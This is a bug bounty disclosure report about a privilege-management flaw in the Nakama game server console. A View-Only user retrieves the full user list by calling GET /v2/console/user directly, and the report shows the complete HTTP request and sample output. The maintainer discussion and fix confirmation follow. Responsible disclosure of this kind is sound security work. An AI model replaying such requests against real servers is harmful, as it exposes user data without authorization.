Improper Privilege Management in heroiclabs/nakama

Valid

Reported on

Jan 21st 2022


Description

A predefined View Only user has access to the User Management function at the <hostname>:7351/#/users endpoint. By default this is a predefined system administrator function, and no other users should be able to access this function.

Proof of Concept

  • Create a View-only user with the administrator
  • Log in with the View-only user.
  • We can see on the menu at the left side of the screen with this user, that the User Management is not even available for the user.
  • If we try to forced browse this URL, we can't access it with the View-Only user from the frontend.
  • Simply use the following request with the Bearer token and the Cookie values of the low privileged View-Only user:

GET /v2/console/user HTTP/1.1
Host: 192.168.214.131:7351
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Referer: http://192.168.214.131:7351/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c24iOiJsb3dwcml2IiwiZW1hIjoibGFiZGFAbG93cHJpdi5jb20iLCJyb2wiOjQsImV4cCI6MTY0Mjg0NTQ3MywiY2tpIjoiZmMyOGU2MTUtYTAwMC00ZWI3LThmNTMtZjdlZGQ4Njg4NGNmIn0.oOdLVbg5CFRb2MTq-tFHeaMud28mDkDic-IkgVx1eQM
Cookie: ajs_anonymous_id=934f700a-9896-4c16-bbff-ee922e311ae4; _hp2_ses_props.203618332=%7B%22ts%22%3A1642759068845%2C%22d%22%3A%22192.168.214.131%22%2C%22h%22%3A%22%2F%22%2C%22g%22%3A%22%23%2Flogin%3Fnext%3D%252Fstatus%22%7D; _hp2_id.203618332=%7B%22userId%22%3A%224724037557972206%22%2C%22pageviewId%22%3A%22372634278966824%22%2C%22sessionId%22%3A%221128263351468919%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D

  • the request contains the list of the registered users on the frontend, like it's show on the following line:

{"users":[{"username":"Alma", "email":"secret@user.com", "role":4}, {"username":"lowpriv", "email":"labda@lowpriv.com", "role":4}]}

Impact

Users with inappropriate access rights can access privileged functions by simply calling the /v2/console/user API call described above.

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. 6 months ago
TheLabda modified the report
6 months ago
We have contacted a member of the heroiclabs/nakama team and are waiting to hear back 5 months ago
We have sent a follow up to the heroiclabs/nakama team. We will try again in 7 days. 5 months ago
heroiclabs/nakama maintainer
5 months ago

Strictly speaking this is a vulnerability - however practically speaking this extremely low impact from a security standpoint.

This refers to the User Management view of the console API not disallowing API access to users who should not be able to access or manipulate the data behind the scene.

The reason why this is extremely low priority is that the users using the Nakama Console will be have come trusted by the administrators of Nakama Server; usually from the same game studio/organisation. These users are already trusted individuals within the organisation.

We’ll fix this at a later date, however.

Mo Firouz validated this vulnerability 5 months ago
TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome
5 months ago

Admin


Hi Mo, I can see that our platform has auto-assigned a CVE for this report. The researcher has indicated that you would not like to assign a CVE for this report, can you please confirm, and I will remove the CVE from this report 👍

We have sent a fix follow up to the heroiclabs/nakama team. We will try again in 7 days. 5 months ago
We have sent a second fix follow up to the heroiclabs/nakama team. We will try again in 10 days. 5 months ago
We have sent a third and final fix follow up to the heroiclabs/nakama team. This report is now considered stale. 5 months ago
Mo Firouz
2 months ago

This is fixed in this commit: 8e71029d99376aaa7473ba4e8ade65f9a1097161 and will be in 3.12.0 release.

Thank you!

Mo Firouz confirmed that a fix has been merged on 8e7102 2 months ago
The fix bounty has been dropped
to join this conversation